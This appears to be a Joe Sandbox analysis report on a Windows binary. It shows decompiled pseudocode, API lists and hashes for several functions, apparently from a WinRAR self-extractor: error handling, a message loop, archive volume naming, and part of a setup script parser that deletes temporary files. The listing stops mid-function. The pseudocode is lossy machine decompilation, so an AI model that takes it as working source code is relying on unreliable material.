Instruction Fuzzy Hash: 5B01753211A311AFE6143AB5AC4DB3A2BD5EB51B7C760273BF521551E0EF515D40A34C

Uniqueness

Uniqueness Score: -1.00%

Function 00C897E5 Relevance: 9.0, APIs: 6, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 69%

			E00C897E5(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t30;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_push(_t30);
				_t36 = GetLastError();
				_t2 =  *0xc9e7fc; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00C8B136(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00C8AEB1(_t20, _t25, _t31, __eflags,  *0xc9e7fc, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00C89649(_t25, _t31, 0xcc2288);
							E00C88DCC(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00C88DCC();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00C88D24(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0xc9e7fc; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00C8B136(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00C8AEB1(_t21, _t27, _t32, __eflags,  *0xc9e7fc, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00C89649(_t27, _t32, 0xcc2288);
									E00C88DCC(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00C88DCC();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00C8AE5B(0, _t25, _t31, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00C8AE5B(__ebx, _t23, _t30, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x00c897e5
0x00c897e5
0x00c897e5
0x00c897e8
0x00c897ef
0x00c897f1
0x00c897f6
0x00c897f9
0x00c89807
0x00c8980e
0x00c89813
0x00c89816
0x00c89819
0x00c8982b
0x00c89830
0x00c89832
0x00c8983d
0x00c89844
0x00c89849
0x00c8984c
0x00c8984e
0x00000000
0x00000000
0x00000000
0x00000000
0x00c89834
0x00c89834
0x00000000
0x00c89834
0x00c8981b
0x00c8981b
0x00c8981c
0x00c8981c
0x00c89821
0x00c8985c
0x00c8985d
0x00c89863
0x00c89868
0x00c8986b
0x00c8986c
0x00c8986d
0x00c89874
0x00c89876
0x00c89878
0x00c8987d
0x00c89880
0x00c8988e
0x00c8989a
0x00c8989d
0x00c898a0
0x00c898b2
0x00c898b7
0x00c898b9
0x00c898c4
0x00c898ca
0x00c898d2
0x00c898d4
0x00000000
0x00000000
0x00000000
0x00000000
0x00c898bb
0x00c898bb
0x00000000
0x00c898bb
0x00c898a2
0x00c898a2
0x00c898a3
0x00c898a3
0x00c898d6
0x00c898d7
0x00c898d7
0x00c89882
0x00c89888
0x00c8988c
0x00c898df
0x00c898e0
0x00c898e6
0x00000000
0x00000000
0x00000000
0x00c8988c
0x00c898ed
0x00c898ed
0x00c897fb
0x00c89801
0x00c89805
0x00c89850
0x00c89851
0x00c8985b
0x00000000
0x00000000
0x00000000
0x00c89805

APIs

GetLastError.KERNEL32(?,00CA1098,00C84674,00CA1098,?,?,00C840EF,?,?,00CA1098), ref: 00C897E9
_free.LIBCMT ref: 00C8981C
_free.LIBCMT ref: 00C89844
SetLastError.KERNEL32(00000000,?,00CA1098), ref: 00C89851
SetLastError.KERNEL32(00000000,?,00CA1098), ref: 00C8985D
_abort.LIBCMT ref: 00C89863

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: 4166819976dfd7cbbefeee683032b8ed68fdbdaefac29fdd16f27a891249f25d
Instruction ID: f561d556ed26d985d8c61218623cd70690cc9274dcb9a05daa539ba9a09dd3ea
Opcode Fuzzy Hash: 4166819976dfd7cbbefeee683032b8ed68fdbdaefac29fdd16f27a891249f25d
Instruction Fuzzy Hash: 0FF0A436140603A6C6123364AC0EB3F1A65CFE277DF29012AF524A22D2EF348916A76D

Uniqueness

Uniqueness Score: -1.00%

Function 00C7DC3B Relevance: 9.0, APIs: 6, Instructions: 42
windowsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C7DC3B(void* _a4) {
				struct tagMSG _v32;
				long _t7;
				long _t10;

				_t7 = WaitForSingleObject(_a4, 0xa);
				if(_t7 == 0x102) {
					do {
						if(PeekMessageW( &_v32, 0, 0, 0, 0) != 0) {
							GetMessageW( &_v32, 0, 0, 0);
							TranslateMessage( &_v32);
							DispatchMessageW( &_v32);
						}
						_t10 = WaitForSingleObject(_a4, 0xa);
					} while (_t10 == 0x102);
					return _t10;
				}
				return _t7;
			}

0x00c7dc47
0x00c7dc54
0x00c7dc59
0x00c7dc69
0x00c7dc72
0x00c7dc7c
0x00c7dc86
0x00c7dc86
0x00c7dc91
0x00c7dc97
0x00000000
0x00c7dc9b
0x00c7dc9e

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 00C7DC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C7DC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7DC72
TranslateMessage.USER32(?), ref: 00C7DC7C
DispatchMessageW.USER32(?), ref: 00C7DC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 00C7DC91

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: Message$ObjectSingleWait$DispatchPeekTranslate
String ID:
API String ID: 2148572870-0
Opcode ID: 91ba73ac5112ce7ede243b6664a946b7a88626113ff7e5a7bf0240fdaeefbd4a
Instruction ID: de9070013b5b0ff95849fd1c3bd6e14502414c577efc151ff0fd0f97774f4dc3
Opcode Fuzzy Hash: 91ba73ac5112ce7ede243b6664a946b7a88626113ff7e5a7bf0240fdaeefbd4a
Instruction Fuzzy Hash: E0F01472A01259BACA216BA5EC4DFCF7F7DEF42791B008021F50AE2060D6648646CAA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C6C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C6C0C5(short* _a4, char _a12) {
				signed short* _v4;
				void* __ebp;
				intOrPtr* _t20;
				signed short* _t24;
				char _t27;
				char _t30;
				signed short* _t31;
				short _t32;
				signed int _t33;
				short _t34;
				signed short* _t37;
				char _t39;
				char _t40;
				char _t41;
				intOrPtr _t44;
				void* _t47;
				void* _t48;
				short* _t54;
				intOrPtr* _t56;
				signed short _t57;
				short* _t58;
				intOrPtr* _t59;
				signed int _t62;
				signed short* _t63;
				short _t66;
				signed short _t67;

				_t58 = _a4;
				_t20 = E00C6B92D(_t58);
				_t44 = _a4;
				_t59 = _t20;
				_t68 = _t59;
				if(_t59 != 0) {
					__eflags =  *((intOrPtr*)(_t59 + 2));
					if( *((intOrPtr*)(_t59 + 2)) == 0) {
						L7:
						__eflags = _t44 - (_t59 - _t58 >> 1);
						E00C70602(_t59, L".rar", _t44 - (_t59 - _t58 >> 1));
					} else {
						_t40 = E00C71FBB(_t59, L".exe");
						__eflags = _t40;
						if(_t40 == 0) {
							goto L7;
						} else {
							_t41 = E00C71FBB(_t59, L".sfx");
							__eflags = _t41;
							if(_t41 == 0) {
								goto L7;
							}
						}
					}
				} else {
					E00C705DA(_t68, _t58, L".rar", _t44);
					_t59 = E00C6B92D(_t58);
					if(_t59 == 0) {
						L2:
						 *_t58 = 0;
						return 0;
					}
				}
				_t24 = 0x2e;
				_v4 = _t24;
				__eflags =  *_t59 - _t24;
				if( *_t59 != _t24) {
					goto L2;
				}
				__eflags =  *((intOrPtr*)(_t59 + 2));
				if( *((intOrPtr*)(_t59 + 2)) == 0) {
					goto L2;
				}
				__eflags = _a12;
				if(__eflags != 0) {
					_t12 = _t59 + 4; // 0x4
					_t65 = _t12;
					_t27 = E00C7047A( *_t12 & 0x0000ffff);
					__eflags = _t27;
					if(_t27 == 0) {
						L30:
						return E00C70602(_t65, L"00", _t44 - (_t59 - _t58 >> 1) - 2);
					}
					_t30 = E00C7047A( *(_t59 + 6) & 0x0000ffff);
					__eflags = _t30;
					if(_t30 == 0) {
						goto L30;
					}
					_t31 = E00C83E13(_t59);
					_t47 = 0x3a;
					_t14 = _t31 - 1; // -1
					_t54 = _t59 + _t14 * 2;
					 *_t54 =  *_t54 + 1;
					__eflags =  *_t54 - _t47;
					if( *_t54 == _t47) {
						_t66 = 0x30;
						while(1) {
							__eflags = _t54 - _t58;
							if(_t54 <= _t58) {
								break;
							}
							_t33 =  *(_t54 - 2) & 0x0000ffff;
							_t62 = _t33;
							__eflags = _t33 - _v4;
							if(_t33 == _v4) {
								break;
							}
							 *_t54 = _t66;
							_t34 = _t62 + 1;
							_t54 = _t54 + 0xfffffffe;
							 *_t54 = _t34;
							__eflags = _t34 - _t47;
							if(_t34 == _t47) {
								continue;
							}
							return _t34;
						}
						_t32 = 0x61;
						 *_t54 = _t32;
						return _t32;
					}
				} else {
					_t31 = E00C6BA1E(0, __eflags, _t58);
					_t63 = _t31;
					_t48 = 0x3a;
					 *_t63 =  *_t63 + 1;
					__eflags =  *_t63 - _t48;
					if( *_t63 == _t48) {
						_t67 = 0x30;
						while(1) {
							_v4 = _t63;
							 *_t63 = _t67;
							_t63 = _t63 - 2;
							__eflags = _t63 - _t58;
							if(_t63 < _t58) {
								break;
							}
							_t39 = E00C7047A( *_t63 & 0x0000ffff);
							__eflags = _t39;
							if(_t39 == 0) {
								break;
							}
							 *_t63 =  *_t63 + 1;
							__eflags =  *_t63 - _t48;
							if( *_t63 == _t48) {
								continue;
							}
							return _t39;
						}
						_t56 = _t58 + E00C83E13(_t58) * 2;
						while(1) {
							__eflags = _t56 - _t63;
							if(_t56 == _t63) {
								break;
							}
							 *((short*)(_t56 + 2)) =  *_t56;
							_t56 = _t56 - 2;
							__eflags = _t56;
						}
						_t37 = _v4;
						_t57 = 0x31;
						 *_t37 = _t57;
						return _t37;
					}
				}
				return _t31;
			}

0x00c6c0ca
0x00c6c0cf
0x00c6c0d4
0x00c6c0d8
0x00c6c0dc
0x00c6c0de
0x00c6c105
0x00c6c109
0x00c6c129
0x00c6c131
0x00c6c13a
0x00c6c10b
0x00c6c111
0x00c6c116
0x00c6c118
0x00000000
0x00c6c11a
0x00c6c120
0x00c6c125
0x00c6c127
0x00000000
0x00000000
0x00c6c127
0x00c6c118
0x00c6c0e0
0x00c6c0e7
0x00c6c0f2
0x00c6c0f6
0x00c6c0f8
0x00c6c0fa
0x00000000
0x00c6c0fa
0x00c6c0f6
0x00c6c141
0x00c6c142
0x00c6c146
0x00c6c149
0x00000000
0x00000000
0x00c6c14b
0x00c6c14f
0x00000000
0x00000000
0x00c6c151
0x00c6c156
0x00c6c1bf
0x00c6c1bf
0x00c6c1c7
0x00c6c1cc
0x00c6c1ce
0x00c6c22f
0x00000000
0x00c6c23f
0x00c6c1d5
0x00c6c1da
0x00c6c1dc
0x00000000
0x00000000
0x00c6c1df
0x00c6c1e7
0x00c6c1e8
0x00c6c1eb
0x00c6c1ee
0x00c6c1f1
0x00c6c1f4
0x00c6c1fc
0x00c6c1fd
0x00c6c1fd
0x00c6c1ff
0x00000000
0x00000000
0x00c6c201
0x00c6c205
0x00c6c207
0x00c6c20c
0x00000000
0x00000000
0x00c6c20e
0x00c6c211
0x00c6c214
0x00c6c217
0x00c6c21a
0x00c6c21d
0x00000000
0x00000000
0x00000000
0x00c6c21d
0x00c6c226
0x00c6c227
0x00000000
0x00c6c227
0x00c6c158
0x00c6c159
0x00c6c15e
0x00c6c162
0x00c6c163
0x00c6c166
0x00c6c169
0x00c6c16d
0x00c6c16e
0x00c6c16e
0x00c6c172
0x00c6c175
0x00c6c178
0x00c6c17a
0x00000000
0x00000000
0x00c6c180
0x00c6c185
0x00c6c187
0x00000000
0x00000000
0x00c6c189
0x00c6c18c
0x00c6c18f
0x00000000
0x00000000
0x00000000
0x00c6c18f
0x00c6c19d
0x00c6c1ac
0x00c6c1ac
0x00c6c1ae
0x00000000
0x00000000
0x00c6c1a5
0x00c6c1a9
0x00c6c1a9
0x00c6c1a9
0x00c6c1b0
0x00c6c1b6
0x00c6c1b7
0x00000000
0x00c6c1b7
0x00c6c169
0x00c6c102

APIs

Part of subcall function 00C705DA: _wcslen.LIBCMT ref: 00C705E0

Part of subcall function 00C6B92D: _wcsrchr.LIBVCRUNTIME ref: 00C6B944

_wcslen.LIBCMT ref: 00C6C197
_wcslen.LIBCMT ref: 00C6C1DF

Strings

.rar, xrefs: 00C6C0E1, 00C6C134
.exe, xrefs: 00C6C10B
.sfx, xrefs: 00C6C11A

Memory Dump Source

Source File: 00000000.00000002.251878309.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true

Associated: 00000000.00000002.251871095.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.251992058.0000000000C93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252005081.0000000000C9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252011466.0000000000CA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252019999.0000000000CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252027714.0000000000CC3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.252037084.0000000000CCE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c60000_primosdv3.jbxd

Similarity

API ID: _wcslen$_wcsrchr
String ID: .exe$.rar$.sfx
API String ID: 3513545583-31770016
Opcode ID: dc5c54463ae91ad83b9e7932e20cac1fb5163860aa51868c0a9af9c789dce5e5
Instruction ID: f1a4ff1d18e6ed82d7557142a83d56a7f775854e81d11d4140bb423205ebdd90
Opcode Fuzzy Hash: dc5c54463ae91ad83b9e7932e20cac1fb5163860aa51868c0a9af9c789dce5e5
Instruction Fuzzy Hash: 92412622540351D5C731AF7488D6A7FB3A8EF41714F24490EFDE5AB181EB604F81D395

Uniqueness

Uniqueness Score: -1.00%

Function 00C7CE87 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00C7CE87(intOrPtr __ebx, void* __ecx, void* __edx) {
				intOrPtr _t225;
				void* _t226;
				signed int _t292;
				void* _t294;
				signed int _t295;
				void* _t299;

				L0:
				while(1) {
					L0:
					if(__ebx != 1) {
						goto L123;
					}
					L107:
					__eax = __ebp - 0x788c;
					__edi = 0x800;
					GetTempPathW(0x800, __ebp - 0x788c) = __ebp - 0x788c;
					__eax = E00C6B690(__eflags, __ebp - 0x788c, 0x800);
					__ebx = 0;
					__esi = 0;
					_push(0);
					while(1) {
						L109:
						_push( *0xc9e724);
						__ebp - 0x788c = E00C64092(0xca946a, __edi, L"%s%s%u", __ebp - 0x788c);
						__eax = E00C6A231(0xca946a);
						__eflags = __al;
						if(__al == 0) {
							break;
						}
						L108:
						__esi =  &(__esi->i);
						__eflags = __esi;
						_push(__esi);
					}
					L110:
					__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0xca946a);
					__eflags =  *(__ebp - 0x588c) - __bx;
					if( *(__ebp - 0x588c) == __bx) {
						while(1) {
							L175:
							_push(0x1000);
							_t213 = _t299 - 0x15; // 0xffffa75f
							_t214 = _t299 - 0xd; // 0xffffa767
							_t215 = _t299 - 0x588c; // 0xffff4ee8
							_t216 = _t299 - 0xf894; // 0xfffeaee0
							_push( *((intOrPtr*)(_t299 + 0xc)));
							_t225 = E00C7B314(0x800, _t299);
							_t277 =  *((intOrPtr*)(_t299 + 0x10));
							 *((intOrPtr*)(_t299 + 0xc)) = _t225;
							if(_t225 != 0) {
								_t226 = _t299 - 0x588c;
								_t294 = _t299 - 0x1b894;
								_t292 = 6;
								goto L2;
							} else {
								break;
							}
							L4:
							while(E00C71FBB(_t299 - 0xf894,  *((intOrPtr*)(0xc9e744 + _t295 * 4))) != 0) {
								_t295 = _t295 + 1;
								if(_t295 < 0xe) {
									continue;
								} else {
									goto L175;
								}
							}
							__eflags = _t295 - 0xd;
							if(__eflags > 0) {
								continue;
							}
							L8:
							switch( *((intOrPtr*)(_t295 * 4 +  &M00C7D41B))) {
								case 0:
									L9:
									__eflags = _t277 - 2;
									if(_t277 == 2) {
										E00C7A64D(_t299 - 0x788c, 0x800);
										E00C6A544(E00C6BDF3(__eflags, _t299 - 0x788c, _t299 - 0x588c, _t299 - 0xd894, 0x800), _t277, _t299 - 0x8894, _t295);
										 *(_t299 - 4) = 0;
										E00C6A67E(_t299 - 0x8894, _t299 - 0xd894);
										E00C66EDB(_t299 - 0x388c);
										while(1) {
											L23:
											_push(0);
											_t240 = E00C6A5D1(_t299 - 0x8894, _t299 - 0x388c);
											__eflags = _t240;
											if(_t240 == 0) {
												break;
											}
											L11:
											SetFileAttributesW(_t299 - 0x388c, 0);
											__eflags =  *(_t299 - 0x2880);
											if(__eflags == 0) {
												L16:
												_t244 = GetFileAttributesW(_t299 - 0x388c);
												__eflags = _t244 - 0xffffffff;
												if(_t244 == 0xffffffff) {
													continue;
												}
												L17:
												_t246 = DeleteFileW(_t299 - 0x388c);
												__eflags = _t246;
												if(_t246 != 0) {
													continue;
												} else {
													_t297 = 0;
													_push(0);
													goto L20;
													L20:
													E00C64092(_t299 - 0x1044, 0x800, L"%s.%d.tmp", _t299 - 0x388c);
													_t301 = _t301 + 0x14;
													_t251 = GetFileAttributesW(_t299 - 0x1044);
													__eflags = _t251 - 0xffffffff;
													if(_t251 != 0xffffffff) {
														_t297 = _t297 + 1;
														__eflags = _t297;
														_push(_t297);
														goto L20;
													} else {
														_t254 = MoveFileW(_t299 - 0x388c, _t299 - 0x1044);
														__eflags = _t254;
														if(_t254 != 0) {
															MoveFileExW(_t299 - 0x1044, 0, 4);
														}
														continue;
													}
												}
											}
											L12:
											E00C6B991(__eflags, _t299 - 0x788c, _t299 - 0x1044, 0x800);
											E00C6B690(__eflags, _t299 - 0x1044, 0x800);
											_t298 = E00C83E13(_t299 - 0x788c);
											__eflags = _t298 - 4;
											if(_t298 < 4) {
												L14:
												_t265 = E00C6BDB4(_t299 - 0x588c);
												__eflags = _t265;
												if(_t265 != 0) {
													break;
												}
												L15:
												_t268 = E00C83E13(_t299 - 0x388c);
												__eflags = 0;
												 *((short*)(_t299 + _t268 * 2 - 0x388a)) = 0;
												E00C7FFF0(0x800, _t299 - 0x44, 0, 0x1e);
												_t301 = _t301 + 0x10;
												 *((intOrPtr*)(_t299 - 0x40)) = 3;
												_push(0x14);
												_pop(_t271);
												 *((short*)(_t299 - 0x34)) = _t271;
												 *((intOrPtr*)(_t299 - 0x3c)) = _t299 - 0x388c;
												_push(_t299 - 0x44);
												 *0xcc307c();
												goto L16;
											}
											L13:
											_t276 = E00C83E13(_t299 - 0x1044);
											__eflags = _t298 - _t276;
											if(_t298 > _t276) {
												goto L15;
											}
											goto L14;
										}
										L24:
										 *(_t299 - 4) =  *(_t299 - 4) | 0xffffffff;
										E00C6A55A(_t299 - 0x8894);
									}
									goto L175;
								case 1:
									L25:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L175;
									} else {
										__eax =  *0xcbfc94;
										__eflags = __eax;
										__ebx = __ebx & 0xffffff00 | __eax == 0x00000000;
										__eflags = __eax;
										if(__eax != 0) {
											__eax =  *0xcbfc94;
											_pop(__ecx);
											_pop(__ecx);
										}
										__bh =  *((intOrPtr*)(__ebp - 0xd));
										__eflags = __bh;
										if(__eflags == 0) {
											__eax = __ebp + 0xc;
											_push(__ebp + 0xc);
											__esi = E00C7B48E(__ecx, __edx, __eflags);
											__eax =  *0xcbfc94;
										} else {
											__esi = __ebp - 0x588c;
										}
										__eflags = __bl;
										if(__bl == 0) {
											__edi = __eax;
										}
										L33:
										__eax = E00C83E13(__esi);
										__eax = __eax + __edi;
										_push(__eax);
										_push( *0xcbfc94);
										__eax = E00C83E3E(__ecx, __edx);
										__esp = __esp + 0xc;
										__eflags = __eax;
										if(__eax == 0) {
											L37:
											__eflags = __bh;
											if(__bh == 0) {
												__eax = L00C83E2E(__esi);
											}
											goto L175;
										}
										L34:
										 *0xcbfc94 = __eax;
										__eflags = __bl;
										if(__bl != 0) {
											__ecx = 0;
											__eflags = 0;
											 *__eax = __cx;
										}
										L36:
										__eax = E00C87686(__eax, __esi);
										_pop(__ecx);
										_pop(__ecx);
										goto L37;
									}
								case 2:
									L39:
									__eflags = __ebx;
									if(__ebx == 0) {
										__ebp - 0x588c = SetWindowTextW( *(__ebp + 8), __ebp - 0x588c);
									}
									goto L175;
								case 3:
									L41:
									__eflags = __ebx;
									if(__ebx != 0) {
										goto L175;
									}
									L42:
									__eflags =  *0xcaa472 - __di;
									if( *0xcaa472 != __di) {
										goto L175;
									}
									L43:
									__eax = 0;
									__edi = __ebp - 0x588c;
									_push(0x22);
									 *(__ebp - 0x1044) = __ax;
									_pop(__eax);
									__eflags =  *(__ebp - 0x588c) - __ax;
									if( *(__ebp - 0x588c) == __ax) {
										__edi = __ebp - 0x588a;
									}
									__eax = E00C83E13(__edi);
									__esi = 0x800;
									__eflags = __eax - 0x800;
									if(__eax >= 0x800) {
										goto L175;
									} else {
										L46:
										__eax =  *__edi & 0x0000ffff;
										_push(0x5c);
										_pop(__ecx);
										__eflags = ( *__edi & 0x0000ffff) - 0x2e;
										if(( *__edi & 0x0000ffff) != 0x2e) {
											L50:
											__eflags = __ax - __cx;
											if(__ax == __cx) {
												L62:
												__ebp - 0x1044 = E00C70602(__ebp - 0x1044, __edi, __esi);
												__ebx = 0;
												__eflags = 0;
												L63:
												_push(0x22);
												_pop(__eax);
												__eax = __ebp - 0x1044;
												__eax = E00C8279B(__ebp - 0x1044, __ebp - 0x1044);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__eflags =  *(__eax + 2) - __bx;
													if( *(__eax + 2) == __bx) {
														__ecx = 0;
														__eflags = 0;
														 *__eax = __cx;
													}
												}
												__eax = __ebp - 0x1044;
												__edi = 0xcaa472;
												E00C70602(0xcaa472, __ebp - 0x1044, __esi) = __ebp - 0x1044;
												__eax = E00C7B1BE(__ebp - 0x1044, __esi);
												__esi = GetDlgItem( *(__ebp + 8), 0x66);
												__ebp - 0x1044 = SetWindowTextW(__esi, __ebp - 0x1044); // executed
												__eax = SendMessageW(__esi, 0x143, __ebx, 0xcaa472); // executed
												__eax = __ebp - 0x1044;
												__eax = E00C83E49(__ebp - 0x1044, 0xcaa472, __eax);
												_pop(__ecx);
												_pop(__ecx);
												__eflags = __eax;
												if(__eax != 0) {
													__ebp - 0x1044 = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x1044);
												}
												goto L175;
											}
											L51:
											__eflags = __ax;
											if(__ax == 0) {
												L53:
												__eax = __ebp - 0x1c;
												__ebx = 0;
												_push(__ebp - 0x1c);
												_push(1);
												_push(0);
												_push(L"Software\\Microsoft\\Windows\\CurrentVersion");
												_push(0x80000002);
												__eax =  *0xcc3028();
												__eflags = __eax;
												if(__eax == 0) {
													__eax = __ebp - 0x14;
													 *(__ebp - 0x14) = 0x1000;
													_push(__ebp - 0x14);
													__eax = __ebp - 0x1044;
													_push(__ebp - 0x1044);
													__eax = __ebp - 0x24;
													_push(__ebp - 0x24);
													_push(0);
													_push(L"ProgramFilesDir");
													_push( *(__ebp - 0x1c));
													__eax =  *0xcc3024();
													_push( *(__ebp - 0x1c));
													 *0xcc3008() =  *(__ebp - 0x14);
													__ecx = 0x7ff;
													__eax =  *(__ebp - 0x14) >> 1;
													__eflags = __eax - 0x7ff;
													if(__eax >= 0x7ff) {
														__eax = 0x7ff;
													}
													__ecx = 0;
													__eflags = 0;
													 *(__ebp + __eax * 2 - 0x1044) = __cx;
												}
												__eflags =  *(__ebp - 0x1044) - __bx;
												if( *(__ebp - 0x1044) != __bx) {
													__eax = __ebp - 0x1044;
													__eax = E00C83E13(__ebp - 0x1044);
													_push(0x5c);
													_pop(__ecx);
													__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x1046)) - __cx;
													if(__eflags != 0) {
														__ebp - 0x1044 = E00C705DA(__eflags, __ebp - 0x1044, "\\", __esi);
													}
												}
												__esi = E00C83E13(__edi);
												__eax = __ebp - 0x1044;
												__eflags = __esi - 0x7ff;
												__esi = 0x800;
												if(__eflags < 0) {
													__ebp - 0x1044 = E00C705DA(__eflags, __ebp - 0x1044, __edi, 0x800);
												}
												goto L63;
											}
											L52:
											__eflags =  *((short*)(__edi + 2)) - 0x3a;
											if( *((short*)(__edi + 2)) == 0x3a) {
												goto L62;
											}
											goto L53;
										}
										L47:
										__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
										if( *((intOrPtr*)(__edi + 2)) != __cx) {
											goto L51;
										}
										L48:
										__edi = __edi + 4;
										__ebx = 0;
										__eflags =  *__edi - __bx;
										if( *__edi == __bx) {
											goto L175;
										}
										L49:
										__ebp - 0x1044 = E00C70602(__ebp - 0x1044, __edi, 0x800);
										goto L63;
									}
								case 4:
									L68:
									__eflags =  *0xcaa46c - 1;
									__eflags = __eax - 0xcaa46c;
									 *__edi =  *__edi + __ecx;
									__eflags =  *(__edx + 7) & __al;
									 *__eax =  *__eax + __al;
									__eflags =  *__eax;
								case 5:
									L73:
									__eax =  *(__ebp - 0x588c) & 0x0000ffff;
									__ecx = 0;
									__eax =  *(__ebp - 0x588c) & 0x0000ffff;
									__eflags = __eax;
									if(__eax == 0) {
										L80:
										 *0xca8457 = __cl;
										 *0xca8460 = 1;
										goto L175;
									}
									L74:
									__eax = __eax - 0x30;
									__eflags = __eax;
									if(__eax == 0) {
										L78:
										 *0xca8457 = __cl;
										L79:
										 *0xca8460 = __cl;
										goto L175;
									}
									L75:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax == 0) {
										goto L80;
									}
									L76:
									__eax = __eax - 1;
									__eflags = __eax;
									if(__eax != 0) {
										goto L175;
									}
									L77:
									 *0xca8457 = 1;
									goto L79;
								case 6:
									L86:
									__edi = 0;
									 *0xcac577 = 1;
									__edi = 1;
									__eax = __ebp - 0x588c;
									__eflags =  *(__ebp - 0x588c) - 0x3c;
									__ebx = __esi;
									 *(__ebp - 0x14) = __eax;
									if( *(__ebp - 0x588c) != 0x3c) {
										L97:
										__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 5;
										if( *((intOrPtr*)(__ebp + 0x10)) != 5) {
											L100:
											__eflags =  *((intOrPtr*)(__ebp + 0x10)) - 4;
											if( *((intOrPtr*)(__ebp + 0x10)) != 4) {
												goto L175;
											}
											L101:
											__eflags = __ebx - 6;
											if(__ebx != 6) {
												goto L175;
											}
											L102:
											__ecx = 0;
											__eflags = 0;
											_push(0);
											L103:
